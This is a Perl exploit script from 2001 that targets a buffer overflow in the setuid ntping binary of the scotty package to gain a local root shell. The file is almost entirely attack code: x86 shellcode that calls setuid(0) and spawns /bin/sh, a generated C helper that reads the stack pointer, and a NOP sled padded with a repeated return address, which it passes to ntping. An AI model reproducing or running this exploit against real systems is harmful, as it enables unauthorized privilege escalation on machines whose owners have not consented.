#!/usr/bin/perl
##
##  Raza Mexicana Team - 2001 -- Scotty/Ntping Local r00t Xploit
##
##  Ntping  (/usr/bin/ntping) part of the scotty package, has a buffer
##  overflow. It's failure is to read a hostname as commandline option
##  without checking the size. 
##
##  Yo_Soy <yo_soy@raza-mexicana.org> - http://www.raza-mexicana.org
##
$shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5f".
             "\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07\x47\x57".
             "\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53".
             "\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
             "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";

print ("[RMHT] scotty/ntping local r00t xploit\n\n");
die ("Use: $0 [offset]\n") if (!$ARGV[0]);
#die ("ntping can't be found...\n") if !(-e "/usr/bin/ntping");

$offset = $ARGV[0];
open (SP, ">esp.c") || die ("Unable to write esp.c");
print SP qq~#include <stdlib.h>
int main() {
        u_long get_sp() { __asm__("movl %esp, %eax"); }
        printf("%p", get_sp);
}
~; close (SP); system("cc -o esp esp.c; rm -f esp.c");
open (S, "./esp |"); $ret = <S>; $len = 520;

for ($x=0; $x<($len - length($shellcode) - 100); $x++) { $buffer .= "\x90";}

$buffer .= $shellcode;
printf ("Usando la direccion: 0x%lx\n", $ret + $offset);

$newaddr = pack("l", ($ret + $offset));
for ($x += length($shellcode); $x < $len; $x +=4) {  $buffer .= $newaddr; }
exec ("/usr/bin/ntping $buffer");